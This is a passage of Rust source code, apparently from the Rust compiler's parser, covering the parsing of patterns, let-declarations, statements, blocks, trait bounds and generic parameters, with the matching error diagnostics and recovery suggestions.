) -> PResult<'a, P<Pat>> {
maybe_recover_from_interpolated_ty_qpath!(self, true);
maybe_whole!(self, NtPat, |x| x);
let lo = self.span;
let pat;
match self.token {
token::BinOp(token::And) | token::AndAnd => {
// Parse &pat / &mut pat
self.expect_and()?;
let mutbl = self.parse_mutability();
if let token::Lifetime(ident) = self.token {
let mut err = self.fatal(&format!("unexpected lifetime `{}` in pattern",
ident));
err.span_label(self.span, "unexpected lifetime");
return Err(err);
}
let subpat = self.parse_pat_with_range_pat(false, expected)?;
pat = PatKind::Ref(subpat, mutbl);
}
token::OpenDelim(token::Paren) => {
// Parse (pat,pat,pat,...) as tuple pattern
let (fields, ddpos, trailing_comma) = self.parse_parenthesized_pat_list()?;
pat = if fields.len() == 1 && ddpos.is_none() && !trailing_comma {
PatKind::Paren(fields.into_iter().nth(0).unwrap())
} else {
PatKind::Tuple(fields, ddpos)
};
}
token::OpenDelim(token::Bracket) => {
// Parse [pat,pat,...] as slice pattern
self.bump();
let (before, slice, after) = self.parse_pat_vec_elements()?;
self.expect(&token::CloseDelim(token::Bracket))?;
pat = PatKind::Slice(before, slice, after);
}
// At this point, token != &, &&, (, [
_ => if self.eat_keyword(kw::Underscore) {
// Parse _
pat = PatKind::Wild;
} else if self.eat_keyword(kw::Mut) {
// Parse mut ident @ pat / mut ref ident @ pat
let mutref_span = self.prev_span.to(self.span);
let binding_mode = if self.eat_keyword(kw::Ref) {
self.diagnostic()
.struct_span_err(mutref_span, "the order of `mut` and `ref` is incorrect")
.span_suggestion(
mutref_span,
"try switching the order",
"ref mut".into(),
Applicability::MachineApplicable
).emit();
BindingMode::ByRef(Mutability::Mutable)
} else {
BindingMode::ByValue(Mutability::Mutable)
};
pat = self.parse_pat_ident(binding_mode)?;
} else if self.eat_keyword(kw::Ref) {
// Parse ref ident @ pat / ref mut ident @ pat
let mutbl = self.parse_mutability();
pat = self.parse_pat_ident(BindingMode::ByRef(mutbl))?;
} else if self.eat_keyword(kw::Box) {
// Parse box pat
let subpat = self.parse_pat_with_range_pat(false, None)?;
pat = PatKind::Box(subpat);
} else if self.token.is_ident() && !self.token.is_reserved_ident() &&
self.parse_as_ident() {
// Parse ident @ pat
// This can give false positives and parse nullary enums,
// they are dealt with later in resolve
let binding_mode = BindingMode::ByValue(Mutability::Immutable);
pat = self.parse_pat_ident(binding_mode)?;
} else if self.token.is_path_start() {
// Parse pattern starting with a path
let (qself, path) = if self.eat_lt() {
// Parse a qualified path
let (qself, path) = self.parse_qpath(PathStyle::Expr)?;
(Some(qself), path)
} else {
// Parse an unqualified path
(None, self.parse_path(PathStyle::Expr)?)
};
match self.token {
token::Not if qself.is_none() => {
// Parse macro invocation
self.bump();
let (delim, tts) = self.expect_delimited_token_tree()?;
let mac = respan(lo.to(self.prev_span), Mac_ { path, tts, delim });
pat = PatKind::Mac(mac);
}
token::DotDotDot | token::DotDotEq | token::DotDot => {
let end_kind = match self.token {
token::DotDot => RangeEnd::Excluded,
token::DotDotDot => RangeEnd::Included(RangeSyntax::DotDotDot),
token::DotDotEq => RangeEnd::Included(RangeSyntax::DotDotEq),
_ => panic!("can only parse `..`/`...`/`..=` for ranges \
(checked above)"),
};
let op_span = self.span;
// Parse range
let span = lo.to(self.prev_span);
let begin = self.mk_expr(span, ExprKind::Path(qself, path), ThinVec::new());
self.bump();
let end = self.parse_pat_range_end()?;
let op = Spanned { span: op_span, node: end_kind };
pat = PatKind::Range(begin, end, op);
}
token::OpenDelim(token::Brace) => {
if qself.is_some() {
let msg = "unexpected `{` after qualified path";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err);
}
// Parse struct pattern
self.bump();
let (fields, etc) = self.parse_pat_fields().unwrap_or_else(|mut e| {
e.emit();
self.recover_stmt();
(vec![], true)
});
self.bump();
pat = PatKind::Struct(path, fields, etc);
}
token::OpenDelim(token::Paren) => {
if qself.is_some() {
let msg = "unexpected `(` after qualified path";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err);
}
// Parse tuple struct or enum pattern
let (fields, ddpos, _) = self.parse_parenthesized_pat_list()?;
pat = PatKind::TupleStruct(path, fields, ddpos)
}
_ => pat = PatKind::Path(qself, path),
}
} else {
// Try to parse everything else as literal with optional minus
match self.parse_literal_maybe_minus() {
Ok(begin) => {
let op_span = self.span;
if self.check(&token::DotDot) || self.check(&token::DotDotEq) ||
self.check(&token::DotDotDot) {
let end_kind = if self.eat(&token::DotDotDot) {
RangeEnd::Included(RangeSyntax::DotDotDot)
} else if self.eat(&token::DotDotEq) {
RangeEnd::Included(RangeSyntax::DotDotEq)
} else if self.eat(&token::DotDot) {
RangeEnd::Excluded
} else {
panic!("impossible case: we already matched \
on a range-operator token")
};
let end = self.parse_pat_range_end()?;
let op = Spanned { span: op_span, node: end_kind };
pat = PatKind::Range(begin, end, op);
} else {
pat = PatKind::Lit(begin);
}
}
Err(mut err) => {
self.cancel(&mut err);
let expected = expected.unwrap_or("pattern");
let msg = format!(
"expected {}, found {}",
expected,
self.this_token_descr(),
);
let mut err = self.fatal(&msg);
err.span_label(self.span, format!("expected {}", expected));
let sp = self.sess.source_map().start_point(self.span);
if let Some(sp) = self.sess.ambiguous_block_expr_parse.borrow().get(&sp) {
self.sess.expr_parentheses_needed(&mut err, *sp, None);
}
return Err(err);
}
}
}
}
let pat = P(Pat { node: pat, span: lo.to(self.prev_span), id: ast::DUMMY_NODE_ID });
let pat = self.maybe_recover_from_bad_qpath(pat, true)?;
if !allow_range_pat {
match pat.node {
PatKind::Range(
_, _, Spanned { node: RangeEnd::Included(RangeSyntax::DotDotDot), .. }
) => {},
PatKind::Range(..) => {
let mut err = self.struct_span_err(
pat.span,
"the range pattern here has ambiguous interpretation",
);
err.span_suggestion(
pat.span,
"add parentheses to clarify the precedence",
format!("({})", pprust::pat_to_string(&pat)),
// "ambiguous interpretation" implies that we have to be guessing
Applicability::MaybeIncorrect
);
return Err(err);
}
_ => {}
}
}
Ok(pat)
}
/// Parses `ident` or `ident @ pat`.
/// used by the copy foo and ref foo patterns to give a good
/// error message when parsing mistakes like `ref foo(a, b)`.
fn parse_pat_ident(&mut self,
binding_mode: ast::BindingMode)
-> PResult<'a, PatKind> {
let ident = self.parse_ident()?;
let sub = if self.eat(&token::At) {
Some(self.parse_pat(Some("binding pattern"))?)
} else {
None
};
// just to be friendly, if they write something like
// ref Some(i)
// we end up here with ( as the current token. This shortly
// leads to a parse error. Note that if there is no explicit
// binding mode then we do not end up here, because the lookahead
// will direct us over to parse_enum_variant()
if self.token == token::OpenDelim(token::Paren) {
return Err(self.span_fatal(
self.prev_span,
"expected identifier, found enum pattern"))
}
Ok(PatKind::Ident(binding_mode, ident, sub))
}
/// Parses a local variable declaration.
fn parse_local(&mut self, attrs: ThinVec<Attribute>) -> PResult<'a, P<Local>> {
let lo = self.prev_span;
let pat = self.parse_top_level_pat()?;
let (err, ty) = if self.eat(&token::Colon) {
// Save the state of the parser before parsing type normally, in case there is a `:`
// instead of an `=` typo.
let parser_snapshot_before_type = self.clone();
let colon_sp = self.prev_span;
match self.parse_ty() {
Ok(ty) => (None, Some(ty)),
Err(mut err) => {
// Rewind to before attempting to parse the type and continue parsing
let parser_snapshot_after_type = self.clone();
mem::replace(self, parser_snapshot_before_type);
let snippet = self.sess.source_map().span_to_snippet(pat.span).unwrap();
err.span_label(pat.span, format!("while parsing the type for `{}`", snippet));
(Some((parser_snapshot_after_type, colon_sp, err)), None)
}
}
} else {
(None, None)
};
let init = match (self.parse_initializer(err.is_some()), err) {
(Ok(init), None) => { // init parsed, ty parsed
init
}
(Ok(init), Some((_, colon_sp, mut err))) => { // init parsed, ty error
// Could parse the type as if it were the initializer, it is likely there was a
// typo in the code: `:` instead of `=`. Add suggestion and emit the error.
err.span_suggestion_short(
colon_sp,
"use `=` if you meant to assign",
"=".to_string(),
Applicability::MachineApplicable
);
err.emit();
// As this was parsed successfully, continue as if the code has been fixed for the
// rest of the file. It will still fail due to the emitted error, but we avoid
// extra noise.
init
}
(Err(mut init_err), Some((snapshot, _, ty_err))) => { // init error, ty error
init_err.cancel();
// Couldn't parse the type nor the initializer, only raise the type error and
// return to the parser state before parsing the type as the initializer.
// let x: <parse_error>;
mem::replace(self, snapshot);
return Err(ty_err);
}
(Err(err), None) => { // init error, ty parsed
// Couldn't parse the initializer and we're not attempting to recover a failed
// parse of the type, return the error.
return Err(err);
}
};
let hi = if self.token == token::Semi {
self.span
} else {
self.prev_span
};
Ok(P(ast::Local {
ty,
pat,
init,
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
attrs,
}))
}
/// Parses a structure field.
fn parse_name_and_ty(&mut self,
lo: Span,
vis: Visibility,
attrs: Vec<Attribute>)
-> PResult<'a, StructField> {
let name = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
Ok(StructField {
span: lo.to(self.prev_span),
ident: Some(name),
vis,
id: ast::DUMMY_NODE_ID,
ty,
attrs,
})
}
/// Emits an expected-item-after-attributes error.
fn expected_item_err(&mut self, attrs: &[Attribute]) -> PResult<'a, ()> {
let message = match attrs.last() {
Some(&Attribute { is_sugared_doc: true, .. }) => "expected item after doc comment",
_ => "expected item after attributes",
};
let mut err = self.diagnostic().struct_span_err(self.prev_span, message);
if attrs.last().unwrap().is_sugared_doc {
err.span_label(self.prev_span, "this doc comment doesn't document anything");
}
Err(err)
}
/// Parse a statement. This stops just before trailing semicolons on everything but items.
/// e.g., a `StmtKind::Semi` parses to a `StmtKind::Expr`, leaving the trailing `;` unconsumed.
pub fn parse_stmt(&mut self) -> PResult<'a, Option<Stmt>> {
Ok(self.parse_stmt_(true))
}
fn parse_stmt_(&mut self, macro_legacy_warnings: bool) -> Option<Stmt> {
self.parse_stmt_without_recovery(macro_legacy_warnings).unwrap_or_else(|mut e| {
e.emit();
self.recover_stmt_(SemiColonMode::Break, BlockMode::Ignore);
None
})
}
fn is_async_block(&self) -> bool {
self.token.is_keyword(kw::Async) &&
(
( // `async move {`
self.is_keyword_ahead(1, &[kw::Move]) &&
self.look_ahead(2, |t| *t == token::OpenDelim(token::Brace))
) || ( // `async {`
self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace))
)
)
}
fn is_async_fn(&self) -> bool {
self.token.is_keyword(kw::Async) &&
self.is_keyword_ahead(1, &[kw::Fn])
}
fn is_do_catch_block(&self) -> bool {
self.token.is_keyword(kw::Do) &&
self.is_keyword_ahead(1, &[kw::Catch]) &&
self.look_ahead(2, |t| *t == token::OpenDelim(token::Brace)) &&
!self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL)
}
fn is_try_block(&self) -> bool {
self.token.is_keyword(kw::Try) &&
self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace)) &&
self.span.rust_2018() &&
// prevent `while try {} {}`, `if try {} {} else {}`, etc.
!self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL)
}
fn is_union_item(&self) -> bool {
self.token.is_keyword(kw::Union) &&
self.look_ahead(1, |t| t.is_ident() && !t.is_reserved_ident())
}
fn is_crate_vis(&self) -> bool {
self.token.is_keyword(kw::Crate) && self.look_ahead(1, |t| t != &token::ModSep)
}
fn is_existential_type_decl(&self) -> bool {
self.token.is_keyword(kw::Existential) &&
self.is_keyword_ahead(1, &[kw::Type])
}
fn is_auto_trait_item(&self) -> bool {
// auto trait
(self.token.is_keyword(kw::Auto) &&
self.is_keyword_ahead(1, &[kw::Trait]))
|| // unsafe auto trait
(self.token.is_keyword(kw::Unsafe) &&
self.is_keyword_ahead(1, &[kw::Auto]) &&
self.is_keyword_ahead(2, &[kw::Trait]))
}
fn eat_macro_def(&mut self, attrs: &[Attribute], vis: &Visibility, lo: Span)
-> PResult<'a, Option<P<Item>>> {
let token_lo = self.span;
let (ident, def) = match self.token {
token::Ident(ident, false) if ident.name == kw::Macro => {
self.bump();
let ident = self.parse_ident()?;
let tokens = if self.check(&token::OpenDelim(token::Brace)) {
match self.parse_token_tree() {
TokenTree::Delimited(_, _, tts) => tts,
_ => unreachable!(),
}
} else if self.check(&token::OpenDelim(token::Paren)) {
let args = self.parse_token_tree();
let body = if self.check(&token::OpenDelim(token::Brace)) {
self.parse_token_tree()
} else {
self.unexpected()?;
unreachable!()
};
TokenStream::new(vec![
args.into(),
TokenTree::Token(token_lo.to(self.prev_span), token::FatArrow).into(),
body.into(),
])
} else {
self.unexpected()?;
unreachable!()
};
(ident, ast::MacroDef { tokens: tokens.into(), legacy: false })
}
token::Ident(ident, _) if ident.name == sym::macro_rules &&
self.look_ahead(1, |t| *t == token::Not) => {
let prev_span = self.prev_span;
self.complain_if_pub_macro(&vis.node, prev_span);
self.bump();
self.bump();
let ident = self.parse_ident()?;
let (delim, tokens) = self.expect_delimited_token_tree()?;
if delim != MacDelimiter::Brace && !self.eat(&token::Semi) {
self.report_invalid_macro_expansion_item();
}
(ident, ast::MacroDef { tokens: tokens, legacy: true })
}
_ => return Ok(None),
};
let span = lo.to(self.prev_span);
Ok(Some(self.mk_item(span, ident, ItemKind::MacroDef(def), vis.clone(), attrs.to_vec())))
}
fn parse_stmt_without_recovery(&mut self,
macro_legacy_warnings: bool)
-> PResult<'a, Option<Stmt>> {
maybe_whole!(self, NtStmt, |x| Some(x));
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
Ok(Some(if self.eat_keyword(kw::Let) {
Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Local(self.parse_local(attrs.into())?),
span: lo.to(self.prev_span),
}
} else if let Some(macro_def) = self.eat_macro_def(
&attrs,
&source_map::respan(lo, VisibilityKind::Inherited),
lo,
)? {
Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Item(macro_def),
span: lo.to(self.prev_span),
}
// Starts like a simple path, being careful to avoid contextual keywords
// such as a union items, item with `crate` visibility or auto trait items.
// Our goal here is to parse an arbitrary path `a::b::c` but not something that starts
// like a path (1 token), but it fact not a path.
// `union::b::c` - path, `union U { ... }` - not a path.
// `crate::b::c` - path, `crate struct S;` - not a path.
} else if self.token.is_path_start() &&
!self.token.is_qpath_start() &&
!self.is_union_item() &&
!self.is_crate_vis() &&
!self.is_existential_type_decl() &&
!self.is_auto_trait_item() &&
!self.is_async_fn() {
let pth = self.parse_path(PathStyle::Expr)?;
if !self.eat(&token::Not) {
let expr = if self.check(&token::OpenDelim(token::Brace)) {
self.parse_struct_expr(lo, pth, ThinVec::new())?
} else {
let hi = self.prev_span;
self.mk_expr(lo.to(hi), ExprKind::Path(None, pth), ThinVec::new())
};
let expr = self.with_res(Restrictions::STMT_EXPR, |this| {
let expr = this.parse_dot_or_call_expr_with(expr, lo, attrs.into())?;
this.parse_assoc_expr_with(0, LhsExpr::AlreadyParsed(expr))
})?;
return Ok(Some(Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Expr(expr),
span: lo.to(self.prev_span),
}));
}
// it's a macro invocation
let id = match self.token {
token::OpenDelim(_) => Ident::invalid(), // no special identifier
_ => self.parse_ident()?,
};
// check that we're pointing at delimiters (need to check
// again after the `if`, because of `parse_ident`
// consuming more tokens).
match self.token {
token::OpenDelim(_) => {}
_ => {
// we only expect an ident if we didn't parse one
// above.
let ident_str = if id.name == kw::Invalid {
"identifier, "
} else {
""
};
let tok_str = self.this_token_descr();
let mut err = self.fatal(&format!("expected {}`(` or `{{`, found {}",
ident_str,
tok_str));
err.span_label(self.span, format!("expected {}`(` or `{{`", ident_str));
return Err(err)
},
}
let (delim, tts) = self.expect_delimited_token_tree()?;
let hi = self.prev_span;
let style = if delim == MacDelimiter::Brace {
MacStmtStyle::Braces
} else {
MacStmtStyle::NoBraces
};
if id.name == kw::Invalid {
let mac = respan(lo.to(hi), Mac_ { path: pth, tts, delim });
let node = if delim == MacDelimiter::Brace ||
self.token == token::Semi || self.token == token::Eof {
StmtKind::Mac(P((mac, style, attrs.into())))
}
// We used to incorrectly stop parsing macro-expanded statements here.
// If the next token will be an error anyway but could have parsed with the
// earlier behavior, stop parsing here and emit a warning to avoid breakage.
else if macro_legacy_warnings && self.token.can_begin_expr() && match self.token {
// These can continue an expression, so we can't stop parsing and warn.
token::OpenDelim(token::Paren) | token::OpenDelim(token::Bracket) |
token::BinOp(token::Minus) | token::BinOp(token::Star) |
token::BinOp(token::And) | token::BinOp(token::Or) |
token::AndAnd | token::OrOr |
token::DotDot | token::DotDotDot | token::DotDotEq => false,
_ => true,
} {
self.warn_missing_semicolon();
StmtKind::Mac(P((mac, style, attrs.into())))
} else {
let e = self.mk_expr(mac.span, ExprKind::Mac(mac), ThinVec::new());
let e = self.maybe_recover_from_bad_qpath(e, true)?;
let e = self.parse_dot_or_call_expr_with(e, lo, attrs.into())?;
let e = self.parse_assoc_expr_with(0, LhsExpr::AlreadyParsed(e))?;
StmtKind::Expr(e)
};
Stmt {
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
node,
}
} else {
// if it has a special ident, it's definitely an item
//
// Require a semicolon or braces.
if style != MacStmtStyle::Braces && !self.eat(&token::Semi) {
self.report_invalid_macro_expansion_item();
}
let span = lo.to(hi);
Stmt {
id: ast::DUMMY_NODE_ID,
span,
node: StmtKind::Item({
self.mk_item(
span, id /*id is good here*/,
ItemKind::Mac(respan(span, Mac_ { path: pth, tts, delim })),
respan(lo, VisibilityKind::Inherited),
attrs)
}),
}
}
} else {
// FIXME: Bad copy of attrs
let old_directory_ownership =
mem::replace(&mut self.directory.ownership, DirectoryOwnership::UnownedViaBlock);
let item = self.parse_item_(attrs.clone(), false, true)?;
self.directory.ownership = old_directory_ownership;
match item {
Some(i) => Stmt {
id: ast::DUMMY_NODE_ID,
span: lo.to(i.span),
node: StmtKind::Item(i),
},
None => {
let unused_attrs = |attrs: &[Attribute], s: &mut Self| {
if !attrs.is_empty() {
if s.prev_token_kind == PrevTokenKind::DocComment {
s.span_fatal_err(s.prev_span, Error::UselessDocComment).emit();
} else if attrs.iter().any(|a| a.style == AttrStyle::Outer) {
s.span_err(s.span, "expected statement after outer attribute");
}
}
};
// Do not attempt to parse an expression if we're done here.
if self.token == token::Semi {
unused_attrs(&attrs, self);
self.bump();
return Ok(None);
}
if self.token == token::CloseDelim(token::Brace) {
unused_attrs(&attrs, self);
return Ok(None);
}
// Remainder are line-expr stmts.
let e = self.parse_expr_res(
Restrictions::STMT_EXPR, Some(attrs.into()))?;
Stmt {
id: ast::DUMMY_NODE_ID,
span: lo.to(e.span),
node: StmtKind::Expr(e),
}
}
}
}))
}
/// Checks if this expression is a successfully parsed statement.
fn expr_is_complete(&self, e: &Expr) -> bool {
self.restrictions.contains(Restrictions::STMT_EXPR) &&
!classify::expr_requires_semi_to_be_stmt(e)
}
/// Parses a block. No inner attributes are allowed.
pub fn parse_block(&mut self) -> PResult<'a, P<Block>> {
maybe_whole!(self, NtBlock, |x| x);
let lo = self.span;
if !self.eat(&token::OpenDelim(token::Brace)) {
let sp = self.span;
let tok = self.this_token_descr();
let mut e = self.span_fatal(sp, &format!("expected `{{`, found {}", tok));
let do_not_suggest_help =
self.token.is_keyword(kw::In) || self.token == token::Colon;
if self.token.is_ident_named(sym::and) {
e.span_suggestion_short(
self.span,
"use `&&` instead of `and` for the boolean operator",
"&&".to_string(),
Applicability::MaybeIncorrect,
);
}
if self.token.is_ident_named(sym::or) {
e.span_suggestion_short(
self.span,
"use `||` instead of `or` for the boolean operator",
"||".to_string(),
Applicability::MaybeIncorrect,
);
}
// Check to see if the user has written something like
//
// if (cond)
// bar;
//
// Which is valid in other languages, but not Rust.
match self.parse_stmt_without_recovery(false) {
Ok(Some(stmt)) => {
if self.look_ahead(1, |t| t == &token::OpenDelim(token::Brace))
|| do_not_suggest_help {
// if the next token is an open brace (e.g., `if a b {`), the place-
// inside-a-block suggestion would be more likely wrong than right
e.span_label(sp, "expected `{`");
return Err(e);
}
let mut stmt_span = stmt.span;
// expand the span to include the semicolon, if it exists
if self.eat(&token::Semi) {
stmt_span = stmt_span.with_hi(self.prev_span.hi());
}
let sugg = pprust::to_string(|s| {
use crate::print::pprust::{PrintState, INDENT_UNIT};
s.ibox(INDENT_UNIT)?;
s.bopen()?;
s.print_stmt(&stmt)?;
s.bclose_maybe_open(stmt.span, INDENT_UNIT, false)
});
e.span_suggestion(
stmt_span,
"try placing this code inside a block",
sugg,
// speculative, has been misleading in the past (closed Issue #46836)
Applicability::MaybeIncorrect
);
}
Err(mut e) => {
self.recover_stmt_(SemiColonMode::Break, BlockMode::Ignore);
self.cancel(&mut e);
}
_ => ()
}
e.span_label(sp, "expected `{`");
return Err(e);
}
self.parse_block_tail(lo, BlockCheckMode::Default)
}
/// Parses a block. Inner attributes are allowed.
fn parse_inner_attrs_and_block(&mut self) -> PResult<'a, (Vec<Attribute>, P<Block>)> {
maybe_whole!(self, NtBlock, |x| (Vec::new(), x));
let lo = self.span;
self.expect(&token::OpenDelim(token::Brace))?;
Ok((self.parse_inner_attributes()?,
self.parse_block_tail(lo, BlockCheckMode::Default)?))
}
/// Parses the rest of a block expression or function body.
/// Precondition: already parsed the '{'.
fn parse_block_tail(&mut self, lo: Span, s: BlockCheckMode) -> PResult<'a, P<Block>> {
let mut stmts = vec![];
while !self.eat(&token::CloseDelim(token::Brace)) {
let stmt = match self.parse_full_stmt(false) {
Err(mut err) => {
err.emit();
self.recover_stmt_(SemiColonMode::Ignore, BlockMode::Ignore);
Some(Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Expr(DummyResult::raw_expr(self.span, true)),
span: self.span,
})
}
Ok(stmt) => stmt,
};
if let Some(stmt) = stmt {
stmts.push(stmt);
} else if self.token == token::Eof {
break;
} else {
// Found only `;` or `}`.
continue;
};
}
Ok(P(ast::Block {
stmts,
id: ast::DUMMY_NODE_ID,
rules: s,
span: lo.to(self.prev_span),
}))
}
/// Parses a statement, including the trailing semicolon.
crate fn parse_full_stmt(&mut self, macro_legacy_warnings: bool) -> PResult<'a, Option<Stmt>> {
// skip looking for a trailing semicolon when we have an interpolated statement
maybe_whole!(self, NtStmt, |x| Some(x));
let mut stmt = match self.parse_stmt_without_recovery(macro_legacy_warnings)? {
Some(stmt) => stmt,
None => return Ok(None),
};
match stmt.node {
StmtKind::Expr(ref expr) if self.token != token::Eof => {
// expression without semicolon
if classify::expr_requires_semi_to_be_stmt(expr) {
// Just check for errors and recover; do not eat semicolon yet.
if let Err(mut e) =
self.expect_one_of(&[], &[token::Semi, token::CloseDelim(token::Brace)])
{
e.emit();
self.recover_stmt();
}
}
}
StmtKind::Local(..) => {
// We used to incorrectly allow a macro-expanded let statement to lack a semicolon.
if macro_legacy_warnings && self.token != token::Semi {
self.warn_missing_semicolon();
} else {
self.expect_one_of(&[], &[token::Semi])?;
}
}
_ => {}
}
if self.eat(&token::Semi) {
stmt = stmt.add_trailing_semicolon();
}
stmt.span = stmt.span.with_hi(self.prev_span.hi());
Ok(Some(stmt))
}
fn warn_missing_semicolon(&self) {
self.diagnostic().struct_span_warn(self.span, {
&format!("expected `;`, found {}", self.this_token_descr())
}).note({
"This was erroneously allowed and will become a hard error in a future release"
}).emit();
}
fn err_dotdotdot_syntax(&self, span: Span) {
self.diagnostic().struct_span_err(span, {
"unexpected token: `...`"
}).span_suggestion(
span, "use `..` for an exclusive range", "..".to_owned(),
Applicability::MaybeIncorrect
).span_suggestion(
span, "or `..=` for an inclusive range", "..=".to_owned(),
Applicability::MaybeIncorrect
).emit();
}
/// Parses bounds of a type parameter `BOUND + BOUND + ...`, possibly with trailing `+`.
///
/// ```
/// BOUND = TY_BOUND | LT_BOUND
/// LT_BOUND = LIFETIME (e.g., `'a`)
/// TY_BOUND = TY_BOUND_NOPAREN | (TY_BOUND_NOPAREN)
/// TY_BOUND_NOPAREN = [?] [for<LT_PARAM_DEFS>] SIMPLE_PATH (e.g., `?for<'a: 'b> m::Trait<'a>`)
/// ```
fn parse_generic_bounds_common(&mut self,
allow_plus: bool,
colon_span: Option<Span>) -> PResult<'a, GenericBounds> {
let mut bounds = Vec::new();
let mut negative_bounds = Vec::new();
let mut last_plus_span = None;
let mut was_negative = false;
loop {
// This needs to be synchronized with `Token::can_begin_bound`.
let is_bound_start = self.check_path() || self.check_lifetime() ||
self.check(&token::Not) || // used for error reporting only
self.check(&token::Question) ||
self.check_keyword(kw::For) ||
self.check(&token::OpenDelim(token::Paren));
if is_bound_start {
let lo = self.span;
let has_parens = self.eat(&token::OpenDelim(token::Paren));
let inner_lo = self.span;
let is_negative = self.eat(&token::Not);
let question = if self.eat(&token::Question) { Some(self.prev_span) } else { None };
if self.token.is_lifetime() {
if let Some(question_span) = question {
self.span_err(question_span,
"`?` may only modify trait bounds, not lifetime bounds");
}
bounds.push(GenericBound::Outlives(self.expect_lifetime()));
if has_parens {
let inner_span = inner_lo.to(self.prev_span);
self.expect(&token::CloseDelim(token::Paren))?;
let mut err = self.struct_span_err(
lo.to(self.prev_span),
"parenthesized lifetime bounds are not supported"
);
if let Ok(snippet) = self.sess.source_map().span_to_snippet(inner_span) {
err.span_suggestion_short(
lo.to(self.prev_span),
"remove the parentheses",
snippet.to_owned(),
Applicability::MachineApplicable
);
}
err.emit();
}
} else {
let lifetime_defs = self.parse_late_bound_lifetime_defs()?;
let path = self.parse_path(PathStyle::Type)?;
if has_parens {
self.expect(&token::CloseDelim(token::Paren))?;
}
let poly_span = lo.to(self.prev_span);
if is_negative {
was_negative = true;
if let Some(sp) = last_plus_span.or(colon_span) {
negative_bounds.push(sp.to(poly_span));
}
} else {
let poly_trait = PolyTraitRef::new(lifetime_defs, path, poly_span);
let modifier = if question.is_some() {
TraitBoundModifier::Maybe
} else {
TraitBoundModifier::None
};
bounds.push(GenericBound::Trait(poly_trait, modifier));
}
}
} else {
break
}
if !allow_plus || !self.eat_plus() {
break
} else {
last_plus_span = Some(self.prev_span);
}
}
if !negative_bounds.is_empty() || was_negative {
let plural = negative_bounds.len() > 1;
let last_span = negative_bounds.last().map(|sp| *sp);
let mut err = self.struct_span_err(
negative_bounds,
"negative trait bounds are not supported",
);
if let Some(sp) = last_span {
err.span_label(sp, "negative trait bounds are not supported");
}
if let Some(bound_list) = colon_span {
let bound_list = bound_list.to(self.prev_span);
let mut new_bound_list = String::new();
if !bounds.is_empty() {
let mut snippets = bounds.iter().map(|bound| bound.span())
.map(|span| self.sess.source_map().span_to_snippet(span));
while let Some(Ok(snippet)) = snippets.next() {
new_bound_list.push_str(" + ");
new_bound_list.push_str(&snippet);
}
new_bound_list = new_bound_list.replacen(" +", ":", 1);
}
err.span_suggestion_hidden(
bound_list,
&format!("remove the trait bound{}", if plural { "s" } else { "" }),
new_bound_list,
Applicability::MachineApplicable,
);
}
err.emit();
}
return Ok(bounds);
}
crate fn parse_generic_bounds(&mut self,
colon_span: Option<Span>) -> PResult<'a, GenericBounds> {
self.parse_generic_bounds_common(true, colon_span)
}
/// Parses bounds of a lifetime parameter `BOUND + BOUND + BOUND`, possibly with trailing `+`.
///
/// ```
/// BOUND = LT_BOUND (e.g., `'a`)
/// ```
fn parse_lt_param_bounds(&mut self) -> GenericBounds {
let mut lifetimes = Vec::new();
while self.check_lifetime() {
lifetimes.push(ast::GenericBound::Outlives(self.expect_lifetime()));
if !self.eat_plus() {
break
}
}
lifetimes
}
/// Matches `typaram = IDENT (`?` unbound)? optbounds ( EQ ty )?`.
fn parse_ty_param(&mut self,
preceding_attrs: Vec<Attribute>)
-> PResult<'a, GenericParam> {
let ident = self.parse_ident()?;
// Parse optional colon and param bounds.
let bounds = if self.eat(&token::Colon) {
self.parse_generic_bounds(Some(self.prev_span))?
} else {
Vec::new()
};
let default = if self.eat(&token::Eq) {
Some(self.parse_ty()?)
} else {
None
};
Ok(GenericParam {
ident,
id: ast::DUMMY_NODE_ID,
attrs: preceding_attrs.into(),
bounds,
kind: GenericParamKind::Type {
default,
}
})
}
/// Parses the following grammar:
///
/// TraitItemAssocTy = Ident ["<"...">"] [":" [GenericBounds]] ["where" ...] ["=" Ty]
fn parse_trait_item_assoc_ty(&mut self)
-> PResult<'a, (Ident, TraitItemKind, ast::Generics)> {
let ident = self.parse_ident()?;
let mut generics = self.parse_generics()?;
// Parse optional colon and param bounds.
let bounds = if self.eat(&token::Colon) {
self.parse_generic_bounds(None)?
} else {
Vec::new()
};
generics.where_clause = self.parse_where_clause()?;
let default = if self.eat(&token::Eq) {
Some(self.parse_ty()?)
} else {
None
};
self.expect(&token::Semi)?;
Ok((ident, TraitItemKind::Type(bounds, default), generics))
}
fn parse_const_param(&mut self, preceding_attrs: Vec<Attribute>) -> PResult<'a, GenericParam> {
self.expect_keyword(kw::Const)?;
let ident = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
Ok(GenericParam {
ident,
id: ast::DUMMY_NODE_ID,
attrs: preceding_attrs.into(),
bounds: Vec::new(),
kind: GenericParamKind::Const {
ty,
}
})
}
/// Parses a (possibly empty) list of lifetime and type parameters, possibly including
/// a trailing comma and erroneous trailing attributes.
crate fn parse_generic_params(&mut self) -> PResult<'a, Vec<ast::GenericParam>> {
let mut params = Vec::new();
loop {
let attrs = self.parse_outer_attributes()?;
if self.check_lifetime() {
let lifetime = self.expect_lifetime();
// Parse lifetime parameter.
let bounds = if self.eat(&token::Colon) {
self.parse_lt_param_bounds()
} else {
Vec::new()
};
params.push(ast::GenericParam {
ident: lifetime.ident,
id: lifetime.id,
attrs: attrs.into(),
bounds,
kind: ast::GenericParamKind::Lifetime,
});
} else if self.check_keyword(kw::Const) {
// Parse const parameter.
params.push(self.parse_const_param(attrs)?);
} else if self.check_ident() {
// Parse type parameter.
params.push(self.parse_ty_param(attrs)?);
} else {
// Check for trailing attributes and stop parsing.
if !attrs.is_empty() {
if !params.is_empty() {
self.struct_span_err(
